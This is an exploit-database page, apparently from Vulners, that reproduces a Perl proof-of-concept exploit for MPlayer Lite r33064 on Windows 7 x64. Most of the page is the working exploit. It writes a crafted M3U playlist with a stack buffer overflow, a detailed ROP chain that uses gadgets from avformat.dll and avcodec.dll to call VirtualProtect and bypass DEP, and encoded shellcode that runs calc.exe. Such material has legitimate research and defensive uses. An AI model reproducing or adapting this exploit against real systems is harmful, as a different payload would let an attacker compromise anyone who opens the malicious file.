Vulners
Lucene search
MPlayer (r33064 Lite) Buffer Overflow + ROP exploit
#!/usr/bin/perl
#
# Exploit Title: Mplayer BOF + ROP Exploit
# Date: 04\05\2011
# Author: Nate_M (based on original WinXP [non ROP] exploit by C4SS!0 and h1ch4m)
# Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
# Version: Lite 33064
# Tested On: Win 7 x64 (doesn't work on 32 bit without heavy modification of offsets)
# CVE : None
use strict;
use warnings;
use IO::File;
print q
{
BOF/ROP exploit created by Nate_M
Now writing M3U file...
};
# windows/exec CMD=calc.exe
# x86/shikata_ga_nai size 227
# badchars = '\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f'
my $shellcode =
"\xe8\xff\xff\xff\xff\xc8\x5a\x2b\xc9\xb1\x33" .
"\xb8\xc4\xc4\xb8\xb3\x66\x81\xec\x10\x10" .
"\x31\x42\x17\x83\xc2\x04\x03\x86\xd7\x5a\x46\xfa" .
"\x30\x13\xa9\x02\xc1\x44\x23\xe7\xf0\x56\x57\x6c\xa0\x66" .
"\x13\x20\x49\x0c\x71\xd0\xda\x60\x5e\xd7\x6b\xce\xb8\xd6" .
"\x6c\xfe\x04\xb4\xaf\x60\xf9\xc6\xe3\x42\xc0\x09\xf6\x83" .
"\x05\x77\xf9\xd6\xde\xfc\xa8\xc6\x6b\x40\x71\xe6\xbb\xcf" .
"\xc9\x90\xbe\x0f\xbd\x2a\xc0\x5f\x6e\x20\x8a\x47\x04\x6e" .
"\x2b\x76\xc9\x6c\x17\x31\x66\x46\xe3\xc0\xae\x96\x0c\xf3" .
"\x8e\x75\x33\x3c\x03\x87\x73\xfa\xfc\xf2\x8f\xf9\x81\x04" .
"\x54\x80\x5d\x80\x49\x22\x15\x32\xaa\xd3\xfa\xa5\x39\xdf" .
"\xb7\xa2\x66\xc3\x46\x66\x1d\xff\xc3\x89\xf2\x76\x97\xad" .
"\xd6\xd3\x43\xcf\x4f\xb9\x22\xf0\x90\x65\x9a\x54\xda\x87" .
"\xcf\xef\x81\xcd\x0e\x7d\xbc\xa8\x11\x7d\xbf\x9a\x79\x4c" .
"\x34\x75\xfd\x51\x9f\x32\xf1\x1b\x82\x12\x9a\xc5\x56\x27" .
"\xc7\xf5\x8c\x6b\xfe\x75\x25\x13\x05\x65\x4c\x16\x41\x21" .
"\xbc\x6a\xda\xc4\xc2\xd9\xdb\xcc\xa0\xbc\x4f\x8c\x08\x5b" .
"\xe8\x37\x55";
my $buf = "\x90" x 1000;
$buf .= $shellcode;
$buf .= "\x41" x (2368-length($buf));;
$buf .= "0000"; # VirtualProtect addr
$buf .= "1111"; # Return addr
$buf .= "2222"; # lpAddress
$buf .= "3333"; # dwsize
$buf .= "4444"; # flNewProtect
$buf .= "\x60\x63\x12\x6B"; # lpflOldProtect
$buf .= "\x41" x 76;
##### Begin ROP Chain, create anchor in memory #####
$buf .= pack('V',0x649ABC7B); # PUSH ESP # POP EBX # POP ESI # RET [avformat.dll]
$buf .= "\x41" x 4;
$buf .= pack('V',0x6B0402A9); # MOV EAX,EBX # POP EBX # RET [avcodec.dll]
$buf .= "\x41" x 4;
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD79CAC); # DEC EAX # RET 68 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AF1DCB5); # XCHG EAX,ECX # RET [avcodec.dll]
$buf .= pack('V',0x6AFA5EE9); # MOV EAX,ECX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
##### Find location of VirtualProtect() in kernel32.dll #####
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 2; # INC EAX # RET 6B [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET D6 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD); # INC EAX # RET D7 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1AE [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 35C [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD); # INC EAX # RET 35D [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 6BA [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET D74 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1AE8 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 35D0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AF1DCB5); # XCHG EAX,ECX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AE8F378); # MOV EAX,DWORD PTR DS:[EAX] # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 12; # DEC EAX # RET 5D [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET BA [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 174 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 2E8 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 5D0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET BA0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1740 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD); # INC EAX # RET 1741 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 2E82 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
##### Find location of shellcode #####
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6B0B79D2); # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 31; # DEC EAX # RET 4A [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 94 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 128 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 250 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 4A0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 940 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
##### Find approx length of shellcode #####
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
##### Set shellcode to read/write #####
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET 4 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 8 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 10 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 20 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 40 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
##### And profit #####
$buf .= pack('V',0x6AD79CAC) x 16; # DEC EAX # RET [avcodec.dll]
$buf .= pack('V',0x6AD44B94); # XCHG EAX,ESP # RET
$buf .= "\x41" x (5172-length($buf));;
$buf .= "\xff\xff\xff\xff";
$buf .= pack('V',0x64953AD6); # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RET
$buf .= "\x41" x 2000;
open(my $FILE,">Exploit.m3u") || die "**Error:\n$!\n";
print $FILE "http:// ".$buf;
close($FILE);
print "\tFile Created With Sucess\n\n";
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2011 00:00Current
7.1High risk
Vulners AI Score7.1